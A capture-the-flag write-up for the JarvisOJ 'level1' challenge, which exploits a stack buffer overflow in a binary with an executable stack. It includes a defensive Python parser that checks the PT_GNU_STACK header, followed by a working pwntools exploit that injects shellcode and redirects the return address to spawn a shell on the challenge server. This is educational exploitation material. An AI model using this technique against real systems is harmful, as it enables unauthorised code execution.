Challenge info
nc pwn2.jarvisoj.com 9877
level1.80eacdcd51aca92af7749d96efad7fb5
NX is not enabled
Static analysis
One pass of F5 in IDA
The flow is simple: there is an obvious stack overflow, and the program prints the address of buf.
So the shellcode can be written straight into buf at that known address, and the overflow is used to overwrite the return address with buf's address so execution lands on the shellcode.
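The whole approach only works because the stack is executable, so the first thing a defender checks on a binary like this is the PT_GNU_STACK program header. The parser below is an added example written for this page, not code from the original writeup or from the challenge files: it reads the program headers of an ELF image and reports whether the stack would be mapped executable. To run offline it inspects a constructed minimal ELF32 image produced by the helper build_elf32 (an assumed helper, not a real file); fed the actual level1 bytes it would report the executable stack the writeup observes.

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header type that records the stack permissions
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4


def stack_is_executable(data: bytes) -> bool:
    """Return True when the ELF image in `data` would get an executable stack.

    Both ELF32 and ELF64 are handled. If no PT_GNU_STACK header is present,
    the Linux loader falls back to an executable stack, so that case is True.
    """
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ei_class, ei_data = data[4], data[5]
    endian = "<" if ei_data == 1 else ">"
    if ei_class == 1:  # ELF32 header layout
        (e_phoff,) = struct.unpack_from(endian + "I", data, 28)
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", data, 42)
        phdr_fmt = endian + "IIIIIIII"  # type, offset, vaddr, paddr, filesz, memsz, flags, align
        flags_index = 6
    elif ei_class == 2:  # ELF64 header layout
        (e_phoff,) = struct.unpack_from(endian + "Q", data, 32)
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", data, 54)
        phdr_fmt = endian + "IIQQQQQQ"  # type, flags, offset, vaddr, paddr, filesz, memsz, align
        flags_index = 1
    else:
        raise ValueError("unknown ELF class %d" % ei_class)
    for i in range(e_phnum):
        ph = struct.unpack_from(phdr_fmt, data, e_phoff + i * e_phentsize)
        if ph[0] == PT_GNU_STACK:
            return bool(ph[flags_index] & PF_X)
    return True  # no PT_GNU_STACK header: kernel default is an executable stack


def build_elf32(stack_flags: int, with_gnu_stack: bool = True) -> bytes:
    """Construct a minimal, non-loadable ELF32 image for testing (assumed helper).

    It carries a single PT_GNU_STACK header with the given p_flags, or no
    program headers at all when with_gnu_stack is False.
    """
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8  # ELFCLASS32, little endian, version 1
    phnum = 1 if with_gnu_stack else 0
    # e_type=EXEC, e_machine=EM_386, e_version, e_entry, e_phoff=52, e_shoff, e_flags,
    # e_ehsize=52, e_phentsize=32, e_phnum, e_shentsize, e_shnum, e_shstrndx
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0, 52, 0, 0, 52, 32, phnum, 0, 0, 0)
    if not with_gnu_stack:
        return ehdr
    phdr = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    return ehdr + phdr


if __name__ == "__main__":
    # Constructed samples: RWX stack (NX off, the level1 situation) versus RW stack (NX on)
    print("RWX stack executable:", stack_is_executable(build_elf32(PF_R | PF_W | PF_X)))
    print("RW  stack executable:", stack_is_executable(build_elf32(PF_R | PF_W)))
    print("no header executable:", stack_is_executable(build_elf32(0, with_gnu_stack=False)))
```

On a real file, `stack_is_executable(open("./level1", "rb").read())` performs the same check that `checksec` reports as the NX line; a True result is what makes a stack-resident shellcode viable, and linking with a non-executable stack (the toolchain default) closes that path.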
(Simple diagram of the stack layout, taken from the web; image not reproduced here.)
Exploit
offset = 140 = 0x88 + 4, because the saved old ebp sits between buf and the return address
Constructing the exploit
```python
from pwn import *

elf = ELF('./level1')
sh = remote('pwn2.jarvisoj.com', 9877)
# sh = process('./level1')
context.arch = 'i386'
context.log_level = 'debug'

# The banner prints the buffer address; the hex string sits at [12:22]
buf_addr = sh.recv()[12:22]
buf_addr = p32(int(buf_addr, 16))

shellcode = asm(shellcraft.sh())
payload = shellcode.ljust(0x88, b'A')  # fill buf up to the saved ebp
payload += b'BBBB'                      # saved ebp
payload += buf_addr                     # return address -> buf

sh.sendline(payload)
sh.interactive()
```
Get the flag